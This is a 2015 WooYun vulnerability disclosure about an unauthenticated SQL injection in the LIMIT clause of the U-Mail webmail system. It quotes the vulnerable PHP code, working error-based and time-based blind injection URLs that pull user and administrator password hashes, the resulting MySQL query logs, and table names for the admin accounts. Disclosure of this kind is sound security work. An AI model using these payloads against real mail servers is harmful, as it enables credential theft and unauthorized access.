当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-094661

漏洞标题:U-Mail邮件系统注入2(SQL Injections in MySQL LIMIT clause,无需登录,附获取用户密码脚本)

相关厂商:U-Mail

漏洞作者: Ano_Tom

提交时间:2015-01-30 12:53

修复时间:2015-05-05 08:26

公开时间:2015-05-05 08:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-30: 细节已通知厂商并且等待厂商处理中
2015-02-04: 厂商已经确认,细节仅向厂商公开
2015-02-07: 细节向第三方安全合作伙伴开放
2015-03-31: 细节向核心白帽子及相关领域专家公开
2015-04-10: 细节向普通白帽子公开
2015-04-20: 细节向实习白帽子公开
2015-05-05: 细节向公众公开

简要描述:

SQL Injections in MySQL LIMIT clause,过滤不严,产生盲注,导致可以注射用户名与密码,无需登录

详细说明:

上次搜索只在client搜索,今天无意在fast目录下搜索了下,又发现了一处。
注:client的目录下的所有函数必须登录才可以执行,fast的目录无需登录可以执行部分存在的函数,但并不能查看邮件等等。
漏洞与上一个原理一样,但文件不同,此处访问权限设置不严格,可以任意用户访问,导致可以无需登录即可sql注入,limit无法使用sleep,用benchamark延时
漏洞文件/fast/oab/module/operates.php代码

if ( ACTION == "member-get" )
{
		$dept_id = gss( $_GET['dept_id'] );
		$keyword = gss( $_GET['keyword'] );
		$page = $_GET['page'] ? gss( $_GET['page'] ) : 1;
		//limit
		$limit = $_GET['limit'] ? gss( $_GET['limit'] ) : 25;//用户可控的变量
		$orderby = gss( $_GET['orderby'] );
		$is_reverse = gss( $_GET['is_reverse'] );
		$data_cache = $Department->getDepartmentByDomainID( $domain_id, "dept_id,name,parent_id,`order`", 0 );
		$department_list = create_array( $data_cache, "dept_id", "name" );
		$where = "";
		if ( $dept_id && $dept_id != "-1" )
		{
				$Tree = $Department->getTreeObject( );
				$Tree->set_data_cache( $data_cache );
				$Tree->sort_data( -1, 1 );
				$dept_ids = $Tree->get_child_id( $dept_id );
				$user_ids = $Department->getMailboxIDByDepartmentID( $dept_ids, 0 );
				$where = "t1.UserID IN (".$user_ids.")";
		}
		if ( $keyword )
		{
				if ( $where )
				{
						$where .= " AND ";
				}
				if ( strpos( $keyword, "@" ) )
				{
						$key_tmp = explode( "@", $keyword );
						$keyword = $key_tmp[0];
				}
				$where .= "(t1.FullName LIKE \"%".$keyword."%\" OR t1.Mailbox LIKE \"%".$keyword."%\")";
		}
		switch ( $orderby )
		{
		case "fullname" :
				$orderby = "t1.FullName";
				break;
		case "mailbox" :
				$orderby = "t1.Mailbox";
				break;
		case "sex" :
				$orderby = "t2.sex";
				break;
		case "birthday" :
				$orderby = "t2.birthday";
				break;
		case "mobile" :
				$orderby = "t2.mobil";
				break;
		case "tel" :
				$orderby = "t2.teleextension";
				break;
		case "position" :
				$orderby = "t2.headship";
				break;
		case "group_num" :
				$orderby = "t2.o_group";
				break;
		case "email" :
				$orderby = "t1.Mailbox";
				break;
				$orderby = "";
		}
		$arr_tmp = $Mailbox->getMailboxInfo( $domain_id, $where, $page, $limit, $orderby, $is_reverse, 0 );//进入了函数


$limit可控,因而产生了注入,注入利用过程
首先向url post数据,(注,其实该接口并非是任意登录,执行后仅可以执行仅有的几个函数,所以如果执行了有sql缺陷的函数,则产生相应了相应的无需登录的sql注入问题,如可以update密保问题则产生了获得任意用户密码的缺陷,但可访问的函数有限,并不能查看用户邮件等等)

a.png


获得认证后,执行如下
http://mail.fuck.com/webmail/fast/oab/index.php?module=operate&action=member-get&limit=1,1+PROCEDURE+analyse(extractvalue(rand(),concat(0x3a,version())),1)
发现结果如下

b.png


其执行的sql语句为

150128 21:44:43	 3142 Connect	umail@localhost on 
		 3142 Query	SET NAMES 'UTF8'
		 3142 Init DB	umail
		 3142 Query	SELECT dept_id,name,parent_id,`order` FROM oab_department WHERE domain_id='1' ORDER BY `order`,`dept_id`
		 3142 Query	SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
				FROM userlist as t1, mailuserinfo as t2
				WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0
				ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
		 3142 Query	SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
				FROM userlist as t1, mailuserinfo as t2
				WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0
				ORDER BY t1.OrderNo DESC,t1.Mailbox ASC LIMIT 1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,version())),1)
		 3142 Quit


c.png


由于未执行错误回显,因而我们实施盲注,代码为
http://mail.fuck.com/webmail/fast/oab/index.php?module=operate&action=member-get&limit=1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,(if(ascii(substr((select password from userlist where userid=2),1,1))=97, BENCHMARK(50000000,SHA1(1)),1)))),1)

d.png


其sql代码为

150128 21:47:16	 3144 Connect	umail@localhost on 
		 3144 Query	SET NAMES 'UTF8'
		 3144 Init DB	umail
		 3144 Query	SELECT dept_id,name,parent_id,`order` FROM oab_department WHERE domain_id='1' ORDER BY `order`,`dept_id`
		 3144 Query	SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
				FROM userlist as t1, mailuserinfo as t2
				WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0
				ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
		 3144 Query	SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
				FROM userlist as t1, mailuserinfo as t2
				WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0
				ORDER BY t1.OrderNo DESC,t1.Mailbox ASC LIMIT 1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,(if(ascii(substr((select password from userlist where userid=2),1,1))=97, BENCHMARK(50000000,SHA1(1)),1)))),1)


成功注入
因而可以通过脚本跑不同的用户帐号和密码,管理员的
#select+password+from+userlist+where+userid=2 system用户
#select+password+from+web_usr+where+usr_code=1 administrator用户
#select+password+from+web_usr+where+usr_code=2 admin用户
普通用户的话遍历userid获取username password即可。
附盲注脚本(脚本写的一半,未用二分法等,将就用)
本地测试

j.jpg


以及官网管理登录截图

e.png


f.png

漏洞证明:

如上

修复方案:

intval

版权声明:转载请注明来源 Ano_Tom@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-02-04 08:24

厂商回复:

最新状态:

暂无